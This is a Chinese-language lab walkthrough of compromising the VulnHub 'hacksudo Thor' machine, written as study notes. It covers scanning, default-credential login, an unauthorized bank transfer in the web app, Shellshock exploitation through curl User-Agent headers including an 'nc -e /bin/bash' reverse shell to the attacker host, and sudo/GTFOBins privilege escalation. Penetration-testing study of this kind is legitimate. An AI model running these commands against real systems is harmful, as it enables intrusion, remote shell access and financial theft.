靶机:
https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip
难度:
- 中
目标:
- 取得root权限+flag
涉及攻击方法:
- 主机发现
- 端口扫描
- Web目录爬取
- 开源源码泄露
- 默认账号密码
- SQL注入
- 破壳漏洞
- GTFOBins提权
主机发现:
sudo arp-scan -l
端口扫描和服务发现
sudo nmap -p- 192.168.31.28
21端口是filtered
状态,22、80端口是开放状态
sudo nmap -p22,80 -sV -sC 192.168.31.28
访问80端口的Web页面
Ctrl + U 查看源代码,发现一个/images
路径
但是这些图片对我们没有啥帮助
在news
页面发现一个注释<!-- cgi-bin ---!>
,cgi
是一种可以在Web服务器端使用外部应用程序来处理客户端提交的请求的一种开发技术
如果使用了cgi
技术,那么在服务器下就会存在一个/cgi-bin/
目录,访问目录发现403
拒绝访问,但是不代表我访问具体文件的时候也拒绝,如果我知道具体文件名的话
目录扫描
sudo dirsearch -u http://192.168.31.28/
,发现README.md
发现一个开源的项目,Web应用程序的源码托管在Github
上面,可以进行白盒测试https://github.com/zakee94/online-banking-system/
发现默认的账号密码,但是在首页登录失败,似乎它修改了
发现/admin_login.php
路径
访问发现是Administrator
的登录界面,输入刚刚在Github
上面发现的默认账号密码admin/password123
成功登录
在Add Customer
那里随便输入一点数据然后点击提交
出现SQL语句报错,这里存在SQL注入漏洞,但是无法通过它突破目标边界,拿到操作系统的Shell,所以就不演示攻击手段了
点击Manage Customers
发现四个账号,可以查看账号的信息,其实这里也存在SQL注入漏洞,但是也是无法突破边界
继续在github
查看源代码,在customer
这个表里面存在uname
和pwd
字段
然后会默认插入一些字段
分析发现了四个默认插入表里的账号密码
'zakee94','nafees123'
'salman','salman123'
'tushar','tushar123'
'jon','snow123'
和我们在Manage Customers
里看到的一样
然后我们回到首页直接尝试登录zakee94
账号
发现有转账记录,那我作为一个攻击者,也能进行转账的操作,我可以在这个银行自己创建一个账号,然后给我转账
尝试给Jon转账,转个2000000试试
点击Submit
,出现Success
成功转账,直接把钱给偷走了
学习记录:
作为一个安全从业人员,一个渗透测试工程师,通常都会去关注操作系统那些个可能被攻击者直接进入我操作系统,直接完全控制我操作系统的这些个技术类的漏洞类型很关注,但是往往很多人对这种业务逻辑层面的漏洞关注程度是不够的,而往往这种业务逻辑层面的漏洞会给企业带来直接的经济损失,所以大家在搞系统维护,安全建设相关工作的时候一定要注重技术性漏洞的同时,也要注重业务逻辑层面的漏洞。
破壳漏洞(Shellshock):
bash
这种shell
类型是有一个环境变量的概念的,而且每个人可以手动的定义这个环境变量,env
命令查看环境变量
在我们编写bash
的shell
脚本的时候,我们通常还可以在shell
脚本中去定义一些函数,将一些我们需要重复调用的指令的集合把它定义成一个固定的函数,接下来如果我们想重复执行这一系列的操作的时候,就可以执行这个函数
w() { echo "Hello $USER, today is date:"; date; }
sudo dirsearch -u http://192.168.31.28/cgi-bin/ -f -e cgi,sh
报500
服务器错误响应码,说明服务器存在这个文件,但是由于我们没有提供正确的参数的变量和赋值,从而导致服务器不知道该怎么继续处理我们的请求。
那我们用nmap
的脚本来进行扫描
sudo nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 192.168.31.28
发现存在漏洞并且可以利用,还给出了CVE的编号,那再看看backup.cgi
文件
sudo nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.31.28
发现也存在漏洞
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'which nc'" \http://192.168.31.28/cgi-bin/shell.sh
通过这条命令确定这台服务器可以执行操作系统指令
反弹shell
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.31.26 4444'" \http://192.168.31.28/cgi-bin/shell.sh
按照惯例升级一下shell
,python3 -c "import pty;pty.spawn('/bin/bash')"
提权:
sudo -l
查看sudo
的权限是否存在漏洞
发现(thor) NOPASSWD: /home/thor/./hammer.sh
那么我们切换到thor
账号并执行这条指令sudo -u thor /home/thor/./hammer.sh
,发现你一个输入的地方类似用户名,可以随便输入,第二个输入的地方会执行系统命令并显示,那我们直接输入bash
来生成一个shell
,成功获得thor
的shell
然后sudo -l
查看配置文件,发现(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
查看开源的GTFOBins网站的提权方法,发现可以sudo service ../../bin/sh
来提权
输入sudo service ../../bin/sh
成功提权